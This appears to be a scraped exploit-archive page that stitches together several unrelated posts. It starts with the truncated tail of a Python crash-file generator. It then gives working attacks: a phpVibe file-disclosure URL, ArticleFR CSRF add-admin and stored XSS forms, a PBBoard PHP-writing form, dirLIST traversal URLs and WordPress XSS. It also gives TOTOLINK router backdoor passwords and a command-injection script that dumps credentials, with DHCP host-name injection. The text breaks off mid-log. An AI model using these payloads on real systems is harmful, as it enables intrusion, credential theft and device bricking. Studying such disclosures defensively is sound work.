B\xC7\x0D\x3C\x55\x6D\x67\xDF\x9A\x9F\xEF\xBF\x74\x36\x77\x23\x1F\xEB\xB5\xF7\xEA\x9D\x6A\xAE\x9B\x6F\xD5\xDD\xB7\x65\xAF\xF7\x97\x16\x23\xDF\xD4\xC3\xA5\x73\xFB\x1F\x14\x79\xFC\xE2\x95\xBF\xB0\xD7\xA8\xC1\x92\x65\x3B\xDB\x3D\x1F\xF3\x45\x00\xC4\x76\x75\x39\xCC\xD4\xF4\x20\xD4\x3B\xE0\x23\xA6\xD4\x24\xFC\x03\xAC\xFB\x82\x8A\xE7\xDB\x93\x00\xFD\x1A\xC0\xB0\xDE\x9B\x2F\x5C\x47\x3F\x3D\x8F\xF1\xFF\x86\x5D\x6E\xBE\x7E\x8D\x17\x5F\x99\xD7\xF2\x3A\x18\xAC\x63\xD2\xFD\x1D\x1C\x3B\x4B\xA9\xFE\xA2\x6A\x4F\x1E\xFF\x8C\xEE\xD6\x48\xAA\xA2\x47\xE7\xDF\xBC\x2C\xB8\xF5\xA4\x03\x9A\x9A\x0D\xE1\x1C\xF4\x3F\x07\xC5\x44\x12\x5E\x68\xB6\x00\x52\xE0\xBF\x01\x23\x4C\x24\x91\xFB\x03\x00\xE4\x6B\xF1\xE1\xEC\xD1\xD9\xEC\x26\xA2\xDF\x04\xE7\xC9\x49\x9E\x74\xCA\x03\xCC\xFD\x38\xF6\xAA\xA0\xA5\x1B\x9E\x8C\x31\x55\x19\x00\x00\xC6\x44\x12\x21\x22\x76\x1B\xDC\x9E\xBF\xD3\x47\x0D\x39\xE5\xE5\xEB\xB3\xB8\xF4\xF5\x4B\xBF\xD2\x99\xEE\xD3\x71\x8F\xA6\xE1\xB8\x3D\x1B\x0D\x4A\x69\x8A\x97\xB6\xEB\x82\xB1\x62\x17\x35\xBD\x99\x1B\xA0\x59\xD8\xB4\x96\x30\x5A\x83\xB3\x67\x88\xCE\xB5\xD3\xB9\x57\x35\x86\x46\x13\x9D\xED\xE8\x59\xBA\xEB\xBE\x5A\x5A\x74\xD2\xBF\x2F\x2B\x66\x2B\xCF\xF1\x7D\x41\x7C\xCE\x9B\xC6\x2F\xD5\x59\xB3\x85\x7A\x34\xA3\xFD\x9E\xD8\x1E\xE9\xB5\x8E\xC6\x76\x40\x3B\x1D\xAE\xC7\xE5\x25\xDF\x7E\xF6\x62\x5B\xE0\xA0\xA6\xBB\x67\x49\xA2\x7D\xA3\x8B\x0D\x30\xFF\xFB\xFE\x9B\x83\xEA\x99\x02\x4D\xD4\x26\x92\xBA\x78\xC9\x17\xAD\x79\xBF\x58\x50\xCE\x1C\x9B\x2E\xCF\x6B\x91\xA8\x17\xD7\xAB\x9A\xDE\xCC\x28\x93\x33\xEF\x8D\xA9\xBB\xDE\x4A\xBC\x75\x4A\xDE\x52\xE7\x49\x3F\x62\x26\xF8\xCC\x46\xB5\x49\xA0\xE1\xD7\x79\x89\x28\xFA\x12\x9B\xCE\x8D\x48\x98\x35\xBB\xF3\xFE\xEA\x9E\x36\x3D\x9B\xD9\xC9\x34\xD6\xDD\x0D\xB0\xBB\xA6\x99\x5C\x69\xD8\x7D\xC9\xDF\x19\x47\x20\x23\x61\xD9\x46\x16\xE8\x46\xC6\xD8\xC2\x13\x73\x8D\x6F\xF8\xFE\x76\x5A\xF8\xF9\x77\x77\xAD\x8B\x37\x73\x32\x95\xD5\x11\x38\x70\x7F\x60\xD9\x60\x1C\x5A\xC2\x0A\xE4\x3F\xC2\x96\x1D\xD0\x00\x0E\x98\x15\xC0\xF0\x1E\xC7\x82\xDE\x07\xD3\x85\x7C\x48\x2F\xF0\xC4\x31\xAD\xC4\xD1\x36\x40\x21\x08\x7E\xDB\x45\x20\x07\xF9\xAF\x81\xF2\x22\x59\x5B\xEF\x96\xC5\x18\xEC\xBF\x06\xC2\x46\x12\xFC\xBD\xFE\xB4\x57\x62\x2F\x7C\x03\x67\x94\xB0\xCF\x39\x6B\x6B\xA3\x32\x2D\x75\x61\x00\x00\x00\x00\x80\xC9\xFB\xD3\x63\x26\xEA\xE7\xC7\xB7\x5F\x5F\xA7\x06\x1B\x93\x7B\x0D\x87\xB3\x8D\xC9\x91\xB3\xDD\x5B\x75\x1D\xB7\x9B\x7E\x65\xA2\xDA\x3B\x48\x5A\x5E\x27\x9A\xB5\x95\x37\xBB\xAB\xF2\x97\xC7\x07\x85\x26\xE7\x68\xD5\x74\xCE\xC9\xB6\x4B\xE5\xF1\xBA\x0F\x44\x48\xB8\x27\xD4\xDD\xA9\x3C\xB2\xEE\x55\x4F\xDA\x6C\xFC\xCA\xDE\xCF\xB0\x32\x9F\x28\xD8\xE1\x97\xBF\xB4\x2B\xCF\x53\x35\xE7\x92\x1C\xBB\x39\xFA\xE5\xE5\xF8\x99\x07\xDC\x1B\x77\xBA\xA9\x0E\x89\xCE\xC2\xD9\xF7\x6F\xE7\xC1\x43\x47\x56\x9E\x99\x9D\x86\x86\x9F\x7A\xB4\x6F\xB9\x6F\x49\x40\x29\x87\xAB\xAF\x6E\x5A\xF5\x44\x53\x71\xF5\xF4\x94\xEF\xE6\xF9\x0F\x31\xE7\x7D\xE3\x55\xAA\xF1\xD8\x84\x76\x35\x67\x32\x6E\x4F\x96\x93\xA5\xCE\x8C\x47\x91\x14\x9F\x35\x7D\x0C\xEF\xC7\xD6\x90\xEC\x7A\xBD\x7B\x8C\x72\x98\xEE\xBB\x78\x3D\x4E\xD7\xCC\x54\xDD\xC5\x5E\x46\x9E\x8A\xFA\x2D\xB9\xE8\xE9\x5D\x95\xBD\x4D\xA8\x9D\x73\x66\x21\x2B\xD7\x76\xC2\x74\xB5\xF7\xDC\xBD\x9F\x29\x8E\x71\x63\xFF\x5B\x12\x9B\x76\x3D\x61\xF8\xB6\xBC\x35\x71\x34\x33\xBF\xFF\x35\x7F\xFE\x2C\x05\xB6\x04\x18\x02\xFF\x0B\xDF\xC2\xE0\x47\x96\x83\x50\x8A\x58\xC2\xD0\x37\xD3\x10\xC3\x14\x51\x15\x45\x01\x1E\x7C\xA5\xAE\x06\xF3\x9F\x05\xC2\x40\xAA\xFD\x6F\x56\x9A\x18\x93\xFD\xE7\x4C\x62\xD8\x48\xD6\xB7\xDA\xF4\x2C\xAC\x63\x8F\x4E\x37\x38\x3B\x55\x30\xDA\x9C\x35\x5A\x6E\x15\x23\xC7\xCE\x00\x00\x00\x00\x00\xE9\x98\x31\x45\xEF\x87\xEF\x67\xE5\xD9\x7A\x7B\xE5\x60\xBD\xB2\x79\x98\xCC\xE2\xEC\xEA\x6B\x97\xD9\xC5\xEA\x14\x2B\x4D\x87\x31\x7E\x30\x7B\xBC\xC7\xC5\xC2\x7E\x5A\x31\x7F\xFD\xB7\xE9\xD1\xA7\x2F\x35\x3C\x2E\xE8\x28\xA3\xAF\x33\x1F\x31\xDE\x38\x13\x3B\x7F\x82\xBE\x23\x9D\x3C\xBF\x08\x3A\xBF\x1E\x26\xA9\xDD\x7B\xD4\x0D\x3F\x1C\x3A\xEB\x86\xCA\xF2\x4D\x48\x71\xE7\xD2\xFE\x1F\x7B\xAC\x25\x55\x22\x97\xC6\xBF\xFB\xA1\x2B\x67\xE3\xEF\xCC\xAC\x2F\xBB\x2A\x35\xEA\xC2\xF8\xE5\xE9\xDE\x69\x7E\x9D\x70\xA2\xA2\x71\x57\xC2\x6C\xC2\xDF\xE2\xEB\x39\xC9\x87\xEC\xD2\x5E\x45\x1D\x53\x5F\xEE\xBF\x3C\x66\x1B\x83\xB5\x5D\x43\x41\xA9\xD9\xFB\x22\x7F\xBD\x70\x73\x25\xF4\xFA\xFE\xCA\xE8\x88\xED\x73\x2E\xB9\x9C\x64\xA7\xB3\x61\x89\x7B\xDF\x11\x44\x52\xDF\x7A\xDC\x92\xEC\x7C\xA2\x2B\x8F\x92\x5C\x9B\xCE\x21\x1F\xC8\xCC\x15\xEF\x53\xB0\x5B\xE5\x51\x5F\x18\x72\x0F\x89\x7F\x69\x59\x10\x58\x36\xF8\x58\x15\x11\x6D\x96\x8E\xDB\xEF\xCD\x38\xC6\xA7\xEF\xE7\xFE\x68\x61\x61\x26\x5E\x15\x11\x95\xC7\xA6\x29\x02\xA6\x8A\x20\x2A\xC6\x91\x88\xBE\x6D\x99\x68\xF8\x2F\xB0\x1C\x38\xB0\x6C\x09\x05\x00\xBE\xAB\x85\x2E\x47\xC8\xFF\x0C\x22\xED\x55\x91\x28\xF2\xAD\x16\x53\x17\xF8\xCF\x19\x30\x90\x78\xAB\x93\x33\x37\xFD\xFB\xB9\xDF\x25\x5C\x5A\x01\xDB\x9C\xFB\x29\xA0\xDC\x67\xAB\x24\x13\xD2\x77\x06\x00\x00\x00\x00\xD8\xC9\x3C\x93\x47\x63\xF7\x34\xFE\xCF\xCC\x36\xDE\xF0\x6B\xEF\xE1\x64\xC2\x28\x91\xE3\xC1\x69\x0E\xC5\x2B\x2D\x39\xB7\xAD\xEB\x6E\xB6\x66\x64\xD7\x2F\x96\xA7\xCB\x3A\xFD\xB5\xF3\xFD\xD5\x43\xF5\xB0\x8D\xBD\xA9\xFE\x31\xA3\xFB\xAF\x0E\xB4\x8A\x60\xC6\x5C\x1A\x5D\xC7\xC1\xDC\x72\x65\x22\x0B\x7C\xC4\xDE\x77\x96\x9F\xAD\xC9\xD3\x33\xDB\xF9\x1F\x3D\x8F\x9C\x49\xA7\xE7\xF5\xBB\x15\xCF\xBB\x93\xF3\x2C\x6D\xF3\x6F\x8C\x35\x97\xFC\x85\xFB\xCE\x1C\xAE\xE1\x92\xD4\xE3\xF1\x3B\x6C\xAC\xD9\xB3\xC2\xDD\xDD\x25\x4E\x37\x8B\xC4\x38\x86\xFB\xBE\xEF\x6B\xEB\x83\x59\xEF\xF9\x15\xE8\x61\xAA\x9A\x66\xB7\x5E\xB6\x2A\xC9\x5E\xFC\x29\x31\x4D\x49\x6F\x9F\x48\xA8\x74\x1D\xE5\xE4\xEB\x3F\x97\x23\xB8\x17\x6C\x7E\xCA\x3F\x5C\xAA\xA4\xA7\x3C\x96\xBD\xF8\xFE\x74\x7F\xF0\xB7\xA9\x3D\x6D\x4D\xEF\x7D\xFF\x5C\x75\x8C\x2E\x7B\x36\x61\xB5\x30\x50\x11\xF0\xCB\x14\x64\x2D\x59\x3D\x9C\xA1\x7E\xEE\x1E\xCF\x90\x39\x4F\x6B\xD3\x1A\x26\x2B\xAC\xF6\x16\x2A\x26\x7A\xF3\xB6\xF5\xCD\x4B\xB0\x6F\x4E\x4B\x56\xEC\x3F\x72\x88\x25\x00\x59\x92\xC1\x96\xF4\x81\xE5\x2D\xD3\xDB\x67\x4B\x72\x53\x55\xCC\xDF\x31\xC4\xB0\xD7\x7B\x72\x33\xD4\x5F\xE4\xF0\xAF\xCF\x0E\x6D\x49\x78\x00\xBE\xAB\x85\x22\x46\xFD\xBF\x41\xC6\x56\x99\x53\xED\x67\xB5\x24\x4C\x71\xFD\x6F\x00\x03\xA9\xFE\x97\xC1\xB0\x76\x02\xA3\x8E\xD4\x29\xA0\xDA\x53\xAD\x72\x34\x7C\x30\x00\x8C\x30\x00\x00\x20\x72\x31\x5C\xFB\x63\x1B\xE5\xA9\x53\xFB\x75\x73\x54\x97\xDD\x6D\xB7\x36\x39\x36\xF5\x0B\xF1\xAE\x04\x0A\xDE\xF4\x91\x78\xC9\x51\xAF\xF1\x13\x6B\xF2\x95\x0F\xDB\x7B\x9F\x8C\xFD\xDF\x79\xF9\xE7\x0F\x07\xD9\x94\xCD\xEB\x94\xBA\xFD\xC7\xE4\xBA\xF6\xE7\xC1\x3C\x72\xAF\x8F\x8B\x33\x1E\x74\x72\x8B\x6C\xC5\x0F\x5D\xED\x93\x12\x1A\xFE\x77\xFF\xFB\xEA\xE4\xFD\x6D\x57\x33\xA6\x39\xD4\xA7\xC1\x65\x65\x73\xE5\x7F\x89\xCD\x66\x53\x03\xFB\x67\x15\x73\x95\x48\xF7\xA6\xE7\x79\x3A\xDD\x1C\x2D\xC7\xCF\x3C\xCE\xF1\xCC\xCC\xA9\xC7\xB9\x23\x1D\x39\x7C\x43\x64\xA9\x9B\x60\xA1\x7D\xF5\x4B\xC6\xDB\x05\x8C\xFC\xA5\xAC\x7B\x3C\x7D\xBE\xBE\xC9\x5B\x91\x71\xB3\x24\xBB\x8D\xEF\x3C\xEA\xDD\x47\x9E\xC8\xC9\x30\xF0\x9B\xA3\xBD\x16\x91\x48\xA2\x42\x4C\x6F\x42\xF5\x99\xCA\xA2\x12\xBA\xEE\xAE\x7D\x5E\x53\x9F\xF5\x01\x93\xC3\xE0\xEB\xA0\x15\x98\x33\x6A\xDD\x4F\x67\x67\x53\x00\x01\x00\x55\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x04\x00\x00\x00\x16\x3D\x35\xFD\x28\x46\xFF\x4C\xFF\x52\xFF\x4E\xFF\x6A\xFF\x53\x46\x51\x54\x53\x56\x52\x51\x58\x51\x52\x48\x44\x56\x54\x56\x56\x53\x58\x53\x51\x51\x56\x52\x57\x57\x55\x52\x57\x54\x3B\x0B\x66\x98\xFB\xBD\xAF\x64\x85\xD6\x55\x54\xFE\x7B\x37\xE0\x9C\x80\xCF\x62\x57\xBC\x6B\x61\xB2\xCC\xFF\xCA\xD2\x2F\x63\xD7\x28\x5C\x9E\xC7\x77\xA1\xDA\xBC\x9F\xFD\x42\x13\x9B\xA7\xA1\xA6\xAA\xA2\xE6\x49\xC5\x14\x11\x51\xC1\x90\xEF\x31\xB8\xFB\x58\x50\x70\x00\x10\x48\x00\x02\x3E\xCC\x65\xB1\x06\xFD\xCF\x81\x74\x33\x24\x0D") filename = "crash.ogg" file = open(filename , "w") file.write(crash) print "\n Files Created!\n" file.close()
HireHackking

phpVibe - Arbitrary File Disclosure

HACKER · %s · %s

## In The Name Of ALLAH ## # Exploit Title: phpVibe ALL versions LFD vulnerability # Google Dork: "powered by phpvibe" # Date: 2015/07/13 (july 13th) # Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com) # Vendor Homepage: http://www.phpvibe.com/ # Software Link: http://get.phpvibe.com/ # Version: All versions # Tested on: linux # greetings : VIRkid, b0x, phantom_x, Ch3rn0by1 stream.php ==================================== $token = htmlspecialchars(base64_decode(base64_decode($_GET["file"]))); file parameter has no validation and sanitization! exploition can be performed by adding "@@media" to the file name and base64 it two times as below (no registration needed): http://domain.tld/stream.php?file=../vibe_config.php@@media ==> http://domain.tld/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09 =====================================
HireHackking

ArticleFR 3.0.6 - Multiple Vulnerabilities

HACKER · %s · %s

 ArticleFR 3.0.6 CSRF Add Admin Exploit Vendor: Free Reprintables Product web page: http://www.freereprintables.com Affected version: 3.0.6 Summary: A lightweight fully featured content (article / video) management system. Comes with a pluginable and multiple module framework system. Desc: The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: nginx/1.6.2 PHP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5248 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5248.php 21.06.2015 -- <html> <body> <form action="http://127.0.0.1/dashboard/users/create/" method="POST"> <input type="hidden" name="username" value="thricer" /> <input type="hidden" name="name" value="The_Hacker" /> <input type="hidden" name="password" value="s3cr3t" /> <input type="hidden" name="email" value="lab@zeroscience.mk" /> <input type="hidden" name="website" value="http://www.zeroscience.mk" /> <input type="hidden" name="blog" value="zsl" /> <input type="hidden" name="membership" value="admin" /> <input type="hidden" name="isactive" value="active" /> <input type="hidden" name="submit" value="Create" /> <input type="submit" value="Request" /> </form> </body> </html> ################################################################## ArticleFR 3.0.6 Multiple Script Injection Vulnerabilities Vendor: Free Reprintables Product web page: http://www.freereprintables.com Affected version: 3.0.6 Summary: A lightweight fully featured content (article / video) management system. Comes with a pluginable and multiple module framework system. Desc: ArticleFR suffers from multiple stored cross-site scripting vulnerabilities. The issues are triggered when input passed via the POST parameter 'name' in Categories, POST parameters 'title' and 'rel' in Links and GET parameter 'url' in PingServers module is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: nginx/1.6.2 PHP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5247 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5247.php 21.06.2015 -- POST 'name' Categories Stored XSS: ---------------------------------- <html> <body> <form action="http://127.0.0.1/dashboard/settings/categories/" method="POST"> <input type="hidden" name="name" value='"><script>alert(1)</script>' /> <input type="hidden" name="parent" value="0" /> <input type="hidden" name="submit" value="Add" /> <input type="submit" value="XSS #1" /> </form> </body> </html> POST 'title', 'rel' Links Stored XSS: ------------------------------------ <html> <body> <form action="http://127.0.0.1/dashboard/settings/links/" method="POST"> <input type="hidden" name="title" value='"><script>alert(2)</script>' /> <input type="hidden" name="url" value="http://www.zeroscience.mk" /> <input type="hidden" name="rel" value='"><script>alert(3)</script>' /> <input type="hidden" name="submit" value="Add" /> <input type="submit" value="XSS #2 and #3" /> </form> </body> </html> POST 'url' Ping Server Reflected XSS: ------------------------------------- <html> <body> <form action="http://127.0.0.1/dashboard/tools/pingservers/" method="POST"> <input type="hidden" name="url" value='http://www.zeroscience.mk"><script>alert(4)</script>' /> <input type="hidden" name="submit" value="Add" /> <input type="submit" value="XSS #4" /> </form> </body> </html>
HireHackking

PBBoard - 'admin.php?xml_name' Arbitrary PHP Code Execution

HACKER · %s · %s

source: https://www.securityfocus.com/bid/54916/info PBBoard is prone to multiple security vulnerabilities including: 1. Multiple SQL-injection vulnerabilities 2. A security-bypass vulnerability 3. An arbitrary file upload vulnerability Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application. PBBoard 2.1.4 is vulnerable; other versions may also be affected. <form action="http://www.example.com/admin.php?page=addons&export=1&export_writing=1&xml_name=file.php" method="post" name="main" id="main"> <input type="hidden" name="context" value='<? phpinfo(); ?>'> <input type="submit" name="Submit" value="Send"> </form>
HireHackking

dirLIST 0.3.0 - Local File Inclusion

HACKER · %s · %s

source: https://www.securityfocus.com/bid/54933/info dirLIST is prone to multiple local file-include vulnerabilities and an arbitrary-file upload vulnerability because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information. http://www.example.com/dirlist_0.3.0/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../windows/win.ini http://www.example.com/irlist_0.3.0/dirLIST_files/thumb_gen.php?image_path=../../../../../windows/win.ini
HireHackking
# WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS # Vendor Homepage: http://www.wpdownloadmanager.com # Software Link: https://wordpress.org/plugins/download-manager # Affected Versions: Free 2.7.94 & Pro 4 # Tested on: WordPress 4.2.2 # Discovered by Filippos Mastrogiannis # Twitter: @filipposmastro # LinkedIn: https://www.linkedin.com/pub/filippos-mastrogiannis/68/132/177 -- Description -- The stored XSS vulnerability allows any authenticated user to inject malicious code via the name of the uploaded file: Example: <svg onload=alert(0)>.jpg The vulnerability exists because the file name is not properly sanitized and this can lead to malicious code injection that will be executed on the target’s browser. -- Proof of Concept -- 1. The attacker creates a new download package via the plugin's menu and uploads a file with the name: <svg onload=alert(0)>.jpg 2. The stored XSS can be triggered when an authenticated user (e.g. admin) attempts to edit this download package -- Solution -- Upgrade to the latest version
HireHackking

4 TOTOLINK Router Models - Backdoor Credentials

HACKER · %s · %s

## Advisory Information Title: Backdoor credentials found in 4 TOTOLINK router models Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x03.txt Blog URL: https://pierrekim.github.io/blog/2015-07-16-backdoor-credentials-found-in-4-TOTOLINK-products.html Date published: 2015-07-16 Vendors contacted: None Release mode: 0days, Released CVE: no current CVE ## Product Description TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO markets in South Korea. TOTOLINK produces routers routers, wifi access points and network devices. Their products are sold worldwide. ## Vulnerabilities Summary Backdoor credentials are present in several TOTOLINK products. It affects 4 TOTOLINK products (firmwares come from totolink.net and from totolink.cn): G150R-V1 : last firmware 1.0.0-B20150330 (TOTOLINK-G150R-V1.0.0-B20150330.1734.web) G300R-V1 : last firmware 1.0.0-B20150330 (TOTOLINK-G300R-V1.0.0-B20150330.1816.web) N150RH-V1 : last firmware 1.0.0-B20131219 (TOTOLINK-N150RH-V1.0.0-B20131219.1014.web) N301RT-V1 : last firmware 1.0.0 (TOTOLINK N301RT_V1.0.0.web) It allows an attacker in the LAN to connect to the device using telnet with 2 different accounts: root and 'onlime_r' which gives with root privileges. ## Details - G150R-V1 and G300R-V1 The init.d script executes these commands when the router starts: [...] cp /etc/passwd_orig /var/passwd cp /etc/group_orig /var/group telnetd& [...] The /etc/passwd_orig contains backdoor credentials: root:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh onlime_r:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/:/dev/null The corresponding passwords are: root:12345 onlime_r:12345 ## Details - N150RH-V1 and N301RT The init.d script executes these commands when the router starts: [...] #start telnetd telnetd& [...] The binary /bin/sysconf executes these commands when the router starts: system("cp /etc/passwd.org /var/passwd 2> /dev/null") The /etc/passwd.org contains backdoor credentials: root:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh onlime_r:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/:/dev/null The corresponding passwords are: root:12345 onlime_r:12345 ## Vendor Response TOTOLINK was not contacted in regard of this case. ## Report Timeline * Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares. * Jun 26, 2015: working PoCs. * Jul 16, 2015: A public advisory is sent to security mailing lists. ## Credit These backdoor credentials were found Pierre Kim (@PierreKimSec). ## References https://pierrekim.github.io/advisories/2015-totolink-0x03.txt ## Disclaimer This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
HireHackking
## Advisory Information Title: 15 TOTOLINK router models vulnerable to multiple RCEs Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x00.txt Blog URL: https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html Date published: 2015-07-16 Vendors contacted: None Release mode: 0days, Released CVE: no current CVE ## Product Description TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO markets in South Korea. TOTOLINK produces routers routers, wifi access points and network devices. Their products are sold worldwide. ## Vulnerabilities Summary The first vulnerability allows to bypass the admin authentication and to get a direct RCE from the LAN side with a single HTTP request. The second vulnerability allows to bypass the admin authentication and to get a direct RCE from the LAN side with a single DHCP request. There are direct RCEs against the routers which give a complete root access to the embedded Linux from the LAN side. The two RCEs affect 13 TOTOLINK products from 2009-era firmwares to the latest firmwares with the default configuration: - TOTOLINK A1004 : until last firmware (9.34 - za1004_en_9_34.bin) - TOTOLINK A5004NS : until last firmware (9.38 - za5004s_en_9_38.bin) - TOTOLINK EX300 : until last firmware (8.68 - TOTOLINK EX300_8_68.bin - totolink.net) - TOTOLINK EX300 : until last firmware (9.36 - ex300_ch_9_36.bin.5357c0 - totolink.cn) - TOTOLINK N150RB : until last firmware (9.08 - zn150rb_en_9_08.bin.5357c0) - TOTOLINK N300RB : until last firmware (9.26 - zn300rb_en_9_26.bin) - TOTOLINK N300RG : until last firmware (8.70 - TOTOLINK N300RG_8_70.bin) - TOTOLINK N500RDG : until last firmware (8.42 - TOTOLINK N500RDG_en_8_42.bin) - TOTOLINK N600RD : until last firmware (8.64 - TOTOLINK N600RD_en_8_64.bin) - TOTOLINK N302R Plus V1 : until the last firmware 8.82 (TOTOLINK N302R Plus V1_en_8_82.bin) - TOTOLINK N302R Plus V2 : until the last firmware 9.08 (TOTOLINK N302R Plus V2_en_9_08.bin) - TOTOLINK A3004NS (no firmware available in totolinkusa.com but ipTIME's A3004NS model was vulnerable to the 2 RCEs) - TOTOLINK EX150 : until the last firmware (8.82 - ex150_ch_8_82.bin.5357c0) The DHCP RCE also affects 2 TOTOLINK products from 2009-era firmwares to the latest firmwares with the default configuration: - TOTOLINK A2004NS : until last firmware (9.60 - za2004s_en_9_60.bin) - TOTOLINK EX750 : until last firmware (9.60 - ex750_en_9_60.bin) Firmwares come from totolink.net and from totolink.cn. - - From my tests, it is possible to use these vulnerabilities to overwrite the firmware with a custom (backdoored) firmware. Concerning the high CVSS score (10/10) of the vulnerabilities and the longevity of this vulnerability (6+ year old), the TOTOLINK users are urged to contact TOTOLINK. ## Details - RCE with a single HTTP request The HTTP server allows the attacker to execute some CGI files. Many of them are vulnerable to a command inclusion which allows to execute commands with the http daemon user rights (root). Exploit code: $ cat totolink.carnage #!/bin/sh if [ ! $1 ]; then echo "Usage:" echo $0 ip command exit 1 fi wget -qO- --post-data="echo 'Content-type: text/plain';echo;echo;PATH=$PATH:/sbin $2 $3 $4" http://$1/cgi-bin/sh The exploits have been written in HTML/JavaScript, in form of CSRF attacks, allowing people to test their systems in live using their browsers: http://pierrekim.github.io/advisories/ o Listing of the filesystem HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-listing.of.the.filesystem.html Using CLI: root@kali:~/totolink# ./totolink.carnage 192.168.1.1 ls | head ash auth busybox cat chmod cp d.cgi date echo false root@kali:~/totolink# o How to retrieve the credentials ? (see login and password at the end of the text file) HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-dump.configuration.including.credentials.html Using CLI: kali# ./totolink.carnage 192.168.1.1 cat /tmp/etc/iconfig.cfg wantype.wan1=dynamic dhblock.eth1=0 ppp_mtu=1454 fakedns=0 upnp=1 ppp_mtu=1454 timeserver=time.windows.com,gmt22,1,480,0 wan_ifname=eth1 auto_dns=1 dhcp_auto_detect=0 wireless_ifmode+wlan0=wlan0,0 dhcpd=0 lan_ip=192.168.1.1 lan_netmask=255.255.255.0 dhcpd_conf=br0,192.168.1.2,192.168.1.253,192.168.1.1,255.255.255.0 dhcpd_dns=164.124.101.2,168.126.63.2 dhcpd_opt=7200,30,200, dhcpd_configfile=/etc/udhcpd.conf dhcpd_lease_file=/etc/udhcpd.leases dhcpd_static_lease_file=/etc/udhcpd.static use_local_gateway=1 login=admin password=admin Login and password are stored in plaintext, which is a very bad security practice. o Current running process: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-current.process.html Using CLI: kali# ./totolink.carnage 192.168.1.1 ps -auxww o Getting the kernel memory: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-getting.kernel.memory.html Using CLI: kali# ./totolink.carnage 192.168.1.1 cat /proc/kcore o Default firewall rules: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-default.firewall.rules.html Using CLI: kali# ./iptime.carnage.l2.v9.52 192.168.1.1 iptables -nL o Opening the management interface on the WAN: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-opening.the.firewall.html o Reboot the device: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-reboot.html o Brick the device: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-bricking.the.device.html An attacker can use the /usr/bin/wget binary located in the file system of the remote device to plant a backdoor and then execute it as root. By the way, d.cgi in /bin/ is an intentional backdoor. ## Details - RCE with a single DHCP request This vulnerability is the exact inverse of CVE-2011-0997. The DHCPD server in TOTOLINK devices allows remote attackers to execute arbitrary commands via shell metacharacters in the host-name field. Sending a DHCP request with this parameter will reboot the device: cat /etc/dhcp/dhclient.conf send host-name ";/sbin/reboot"; When connecting to the UART port (`screen /dev/ttyUSB0 38400`), we will see the stdout of the /dev/console device; the dhcp request will immediately force the reboot of the remote device: Booting... @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize @ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h @ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName @ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16 @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ [...] WiFi Simple Config v1.12 (2009.07.31-11:35+0000). Launch iwcontrol: wlan0 Reaped 317 iwcontrol RUN OK SIGNAL -> Config Update signal progress killall: pppoe-relay: no process killed SIGNAL -> WAN ip changed WAN0 IP: 192.168.2.1 signalling START Invalid upnpd exit killall: upnpd: no process killed upnpd Restart 1 iptables: Bad rule (does a matching rule exist in that chain?) Session Garbage Collecting:Maybe system time is updated.( 946684825 0 ) Update Session timestamp and try it after 5 seconds again. ez_ipupdate callback --> time_elapsed: 0 Run DDNS by IP change: / 192.168.2.1 Reaped 352 iptables: Bad rule (does a matching rule exist in that chain?) Jan 1 00:00:25 miniupnpd[370]: Reloading rules from lease file Jan 1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist Jan 1 00:00:25 miniupnpd[370]: HTTP listening on port 2048 Reaped 363 Led Silent Callback Turn 